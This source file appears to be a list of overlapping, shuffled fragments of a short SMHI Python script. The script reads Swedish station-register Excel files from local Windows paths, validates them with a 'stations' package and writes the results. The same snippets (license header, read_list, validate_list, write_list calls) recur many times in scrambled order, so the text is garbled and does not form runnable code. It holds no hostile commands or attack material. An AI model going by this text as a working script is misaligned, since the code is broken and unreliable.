"# # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import',",
"fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog #",
") # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg',",
"16:37 @author: a002028 \"\"\" from stations.main import App if __name__ == '__main__': app",
"App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' )",
"(c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License (see",
"Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on",
"'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') #",
"'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import",
"= App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid",
"\"\"\" from stations.main import App if __name__ == '__main__': app = App() app.read_list(",
"a002028 \"\"\" from stations.main import App if __name__ == '__main__': app = App()",
"= 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import'",
"app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) #",
"2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if __name__ == '__main__':",
") # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list(",
"fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg',",
"# writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path",
"Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01",
"'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid",
"app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', #",
"file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # # report",
"Swedish Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).",
") app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path)",
"writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path =",
"'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # # report = validator.validate(app.lists['master'])",
") app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log',",
"App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid =",
"# ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator =",
"app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog",
"from stations.main import App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt',",
"http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App",
") # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') #",
"from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) #",
"<gh_stars>0 # Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License:",
"on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if __name__ ==",
"app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) #",
"# fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid,",
"# from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # )",
"reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list(",
"or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import",
"# data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], #",
"and Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created",
"= 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master')",
"fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from",
"@author: a002028 \"\"\" from stations.main import App if __name__ == '__main__': app =",
"Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\"",
"reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid =",
"list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx'",
"== '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid =",
"Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License",
"stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # #",
"ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( #",
"= 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator",
"# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37",
"2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt",
"= 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # # report =",
"fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #,",
"\"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if",
"# Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT",
"__name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid",
"# list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp'",
"writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'],",
"import App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master'",
"if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) #",
"# ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list(",
"License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author:",
"list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read')",
"data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # )",
"stations.main import App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master',",
"'__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx'",
"list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' #",
"# fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import')",
"LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main",
"app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx'",
"# writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master',",
"#, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log",
"# file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # #",
"app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' #",
"list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( #",
"writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes",
"Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if __name__",
"app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', #",
"'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log #"
] |
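The script above switches its input file by commenting fid lines in and out. A hedged sketch of the same pipeline driven by a command-line argument instead; it assumes the same private SMHI "stations" package and reuses only calls that appear in the script.

import argparse

from stations.main import App  # same private package as the script above

parser = argparse.ArgumentParser(
    description='Validate a Stationsregistret import list')
parser.add_argument('fid', help='path to the station register Excel export')
args = parser.parse_args()

app = App()
# Same read -> validate -> write sequence as above, with the path supplied
# on the command line rather than hard-coded.
app.read_list(args.fid, reader='stnreg', list_name='stnreg_import')
app.validate_list('stnreg_import')
app.write_list(writer='stnreg', list_names='stnreg_import')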
[
"validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email',",
"database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already",
"already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise",
"is already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info:",
"info: raise ValidationError('This Roll No is already there in the database.') def validate_prn(self,prn):",
"SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator",
"submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll",
"= StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)])",
"info: raise ValidationError('This Mobile Number is already there in the database.') def validate_email(self,email):",
"email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)])",
"StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state",
"= Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there in the",
"validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in",
"if info: raise ValidationError('This Mobile Number is already there in the database.') def",
"mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name',",
"= Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in the database.')",
"from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm):",
"No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo =",
"= SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No",
"StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city",
"info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there in",
"Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there in the database.')",
"there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password =",
"name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(),",
"StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo",
"No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email =",
"StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info =",
"sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name =",
"class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)]) submit =",
"if info: raise ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo):",
"StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import",
"validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in",
"if info: raise ValidationError('This Email is already there in the database.') class adminForm(FlaskForm):",
"the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number",
"Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll",
"email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)])",
"= StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info",
"Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll",
"import FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError",
"the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is",
"info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in the",
"adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)]) submit = SubmitField('Submit')",
"wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import",
"= Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there in the",
"ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first()",
"SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn",
"already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise",
"import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn =",
"StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise",
"validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city =",
"already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise",
"Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in the database.') class",
"StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit =",
"= StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)])",
"PRN is already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if",
"raise ValidationError('This Mobile Number is already there in the database.') def validate_email(self,email): info",
"= StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()])",
"from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models",
"import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo =",
"validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile",
"def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there",
"ValidationError('This Roll No is already there in the database.') def validate_prn(self,prn): info =",
"in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile",
"raise ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo): info =",
"database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)]) submit",
"ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No',",
"is already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info:",
"No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state =",
"SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is",
"StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email",
"= StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit",
"= StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)])",
"validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit')",
"Email is already there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(),",
"validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first()",
"in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password',",
"validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there",
"validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This",
"import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info",
"from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()])",
"if info: raise ValidationError('This Roll No is already there in the database.') def",
"is already there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()])",
"info: raise ValidationError('This Email is already there in the database.') class adminForm(FlaskForm): email",
"Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def",
"city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo):",
"class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name",
"info: raise ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo): info",
"validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there",
"there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This",
"Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there in the database.')",
"ValidationError('This Email is already there in the database.') class adminForm(FlaskForm): email = StringField('Email',",
"prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No',",
"= Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in the database.')",
"def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already",
"raise ValidationError('This Email is already there in the database.') class adminForm(FlaskForm): email =",
"import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No',",
"wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo",
"validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name',",
"there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This",
"Roll No is already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first()",
"database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already",
"in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN",
"ValidationError('This Mobile Number is already there in the database.') def validate_email(self,email): info =",
"Mobile Number is already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first()",
"from flask_wtf import FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import",
"in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email",
"flask_wtf import FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length,",
"info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there in",
"FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from",
"= StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info:",
"Number is already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if",
"there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This",
"No is already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if",
"rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name',",
"def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already",
"is already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info:",
"the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is",
"def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there",
"Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in the database.') def",
"already there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password",
"the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)])",
"info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in the",
"state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if",
"raise ValidationError('This Roll No is already there in the database.') def validate_prn(self,prn): info",
"database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is",
"PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class"
] |
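The four validate_* methods above differ only in the queried column and the label in the error message. A possible refactor (a sketch, not from the original codebase) collapses them into one helper on a hypothetical mixin.

from wtforms.validators import ValidationError

from SIS.models import Info


class UniqueFieldMixin(object):
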